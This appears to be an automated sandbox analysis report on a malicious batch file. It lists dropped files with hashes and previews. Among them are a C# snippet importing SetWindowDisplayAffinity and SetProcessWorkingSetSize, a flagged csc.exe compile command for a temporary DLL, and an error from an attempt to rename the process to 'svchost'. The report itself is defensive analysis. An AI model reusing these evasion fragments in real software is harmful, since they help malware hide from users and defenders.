                                                                                                                            SHA-256:98E8099209115248A4E77353F3B006B0DC2D681F699D87C643FA2C8E4F8A6802
                                                                                                                            SHA-512:5BAB64431C6A5D16744EF6CAE18E3EC448A68C0A62FA9C30EC16493D230EC9EFD0FE71B45DA4B8F3986DB2FAD7E183712DB947AC1526AAB7DFDA33D052D0989E
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"serviceContext":{"serviceActivityId":"28cb9461-803b-4878-8615-f81aed294a05","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"28cb9461-803b-4878-8615-f81aed294a05|2024-10-06T11:37:32.5539259Z|fabric_msn|EUS2-A|News_661"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):1520
                                                                                                                            Entropy (8bit):5.627334012854225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3USKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKCUIr6hSi9xY+jlmVy95p:kSU4y4RQmFoUeCamfm9qr9tK8NLUISPr
                                                                                                                            MD5:468277DD9B48774B0ADD6570AAE8A5D7
                                                                                                                            SHA1:0CA81C5E99554382741FBA631572EF1B50B19AF7
                                                                                                                            SHA-256:12827ADC1DC0581E4F29D81FFD487E20059ED7CB0C834B8912FCAABE2A8C66A9
                                                                                                                            SHA-512:74E98EBBC5445E19103540F29E24B4676D917CA1EEB291A1525ECB4EB2394592CDE4346B32A4390B189672A6C744106C18D0668C8A19672D8354B61FF2325BFC
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sun Oct 6 13:05:39 2024, 1st section name ".debug$S"
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1336
                                                                                                                            Entropy (8bit):4.009164548872662
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:Hnm9IuZQQNL0iHhwKRmNII+ycuZhN/akSRPNnqSSd:DuCQNHqKRmu1ul/a3jqSC
                                                                                                                            MD5:31AEB34D231C51EADA82F29191E1B17D
                                                                                                                            SHA1:AE44A636D4FB35737E7160B3015C18F0E3D9DF31
                                                                                                                            SHA-256:995F6A0F6A8945DEA56DEC833082F6D91C16BFA2D5779836BF99FB90CA46E649
                                                                                                                            SHA-512:1FF82A9DDB83F10EAF4A6D0F24E7CBBE7F0B7A516BBD3FF72FB04EB397D80EDC930E6608D729763BB9CFF00EE2E13EE0F9BB4C4BCB82528518FB5C36AC76089A
                                                                                                                            Malicious:false
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            File Type:MSVC .res
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):652
                                                                                                                            Entropy (8bit):3.1121485917832956
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCOak7YnqqJPPN5Dlq5J:+RI+ycuZhN/akSRPNnqX
                                                                                                                            MD5:D2AA2B50AB2F23E7A343C4AF7AEEF1F5
                                                                                                                            SHA1:95BD9083F73746EA2D32013EC58BCF9D38C6F180
                                                                                                                            SHA-256:7BAD4DDC23A193DB3DE2C939B2D233E434911852ADE7217333D02B49CC40DA00
                                                                                                                            SHA-512:11B817CF1E4820C7210C174A21D70CB2B774964B77F9860D7BBAC3AD9D4B39AAB657A494BFFBE66CE4F13ED2AE5E8C52BB95FF6A295C0A32018E04745C406823
                                                                                                                            Malicious:false
                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.m.w.k.p.c.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.1.m.w.k.p.c.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):296
                                                                                                                            Entropy (8bit):4.932589529439335
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:V/DssSuVY/so68SRltRknYDV/D7JNo68SRL8C9KJwI0q:V/D9PY/RElHt5fJqEL88K7p
                                                                                                                            MD5:32E8AF8C0F84A8BB4647574F7D67F717
                                                                                                                            SHA1:875D56BC2A5D859C49E9715DDE093395689CD62F
                                                                                                                            SHA-256:6E0CCA3BBA43EBD5456B392D1B69740A3778B8A9FA86DAD6209C3FBE32335E7A
                                                                                                                            SHA-512:9A0362AC5BCE40E06761AA7C9858FEED03F9883BDF7ACC0546FA3F0439EFAC72C211073A23F49A329056467542E09210B9F55652214390D33384244B6C645414
                                                                                                                            Malicious:false
                                                                                                                            Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport("kernel32.dll")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):371
                                                                                                                            Entropy (8bit):5.261657896126073
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fdsZaWsKzxs7+AEszICHhJ23fdsZa5:p37Lvkmb6Ki1sZhsKWZEv1sZhsv
                                                                                                                            MD5:B32149F5055F75FD4592DC1A503CD9D9
                                                                                                                            SHA1:2733EE2828250834FE076E6FF814A1EAC5DC0312
                                                                                                                            SHA-256:586227209693114EEB0A6FCC833F110FDCD242BC0DAB69AA2367A9D2AFF0391D
                                                                                                                            SHA-512:690C726E1CED92064B2ECBA1995E53765FDF730D0C915E0EAFB3331727542917CDE069E3FB3EDD3C5444D390E8526508615918720DF2798632D7822FEFB22B1E
                                                                                                                            Malicious:true
                                                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.0.cs"
                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3072
                                                                                                                            Entropy (8bit):2.922647943849408
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:etGS95GIY/vlqu8NMHkghD9xHyKtkZfbbrdoVWI+ycuZhN/akSRPNnq:6OIil0NKkgb9y9Jbbrdl1ul/a3jq
                                                                                                                            MD5:BC9F1498039E5EE58D0AEBD0EE740F22
                                                                                                                            SHA1:A37D20BB4C97761031C107FB1231E629FBD6ED6E
                                                                                                                            SHA-256:48FB462B870285FC7264825DB563DD915B0174ED3A960E1FB05D23CD101834CE
                                                                                                                            SHA-512:D79FE3611A895BA51D7A9291763565BEFB29A9D359B46F2315C2564E9AD06D767E61BE6045E41E301402AFC49700A6569786793B00F74167B8E8FB3EB83539A3
                                                                                                                            Malicious:true
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..g...........!.................#... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..@.............................................................(....*BSJB............v4.0.30319......l...0...#~......<...#Strings............#US.........#GUID.......P...#Blob...........G.........%3............................................................-.&...................................................... 4............ M.....P ......f.........l.....q.....|...............f.....f...!.f. ...f.......%.......".-.....4.......M.....................................
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):872
                                                                                                                            Entropy (8bit):5.321575188428285
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:KOId3ka6KiuZhsrEvuZhsWKax5DqBVKVrdFAMBJTH:xkka6LuHsrEvuHsWK2DcVKdBJj
                                                                                                                            MD5:47026768BF430EE2C82C72F44C9D8441
                                                                                                                            SHA1:C617A4D3528D2BC6324E0D120FAF7364E81CFE55
                                                                                                                            SHA-256:11B43268CD40D2EBE4A499561AD4EEC66BE168195B5E8CAF2D6BB3D47240EAEC
                                                                                                                            SHA-512:9A06AED2030F9245F2DD2470A00264D26EA1180DEE892BA942E265908386BFAA53B128FB47463BE5E44E56D4E71C982696509CABC6772BFB89AEAE826716E429
                                                                                                                            Malicious:false
                                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):55
                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):362
                                                                                                                            Entropy (8bit):4.700364655615608
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:EI8CLXWqSRMRo2Wa7zWCFnoc2A4SzERV1WENUMZhTv:EI8CLWqTona7zWCpvzEX1W+Nvj
                                                                                                                            MD5:F14784C1C7E18502AD7BC0D8ED0649EE
                                                                                                                            SHA1:749CD2F46F31A17499F2C3AB29E3BF661E45871B
                                                                                                                            SHA-256:BEF92178A9D6B683B53C32082F380BBB3B41F6652DA55712CBDCCC013D16927E
                                                                                                                            SHA-512:CDCAB04918F88DF054BC1B7EEF57BC97CCE30CF0D58006E42E8DFAD27644E4B7076785E7645FC3C004EB914E7ECAABF53FF314C93FFE58E83A38D3D2D88AA6AD
                                                                                                                            Malicious:false
                                                                                                                            Preview:False..True..'ProcessName' is a ReadOnly property...At line:1 char:588..+ ... ingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : InvalidOperation: (:) [], RuntimeException.. + FullyQualifiedErrorId : PropertyAssignmentException.. ..
                                                                                                                            File type:DOS batch file, ASCII text, with very long lines (659), with CRLF line terminators
                                                                                                                            Entropy (8bit):6.069483177704481
                                                                                                                            TrID:
                                                                                                                              File name:main.bat.bin.bat
                                                                                                                              File size:109'378 bytes
                                                                                                                              MD5:e9586e0e3590d13cc5a4c413b18efd12
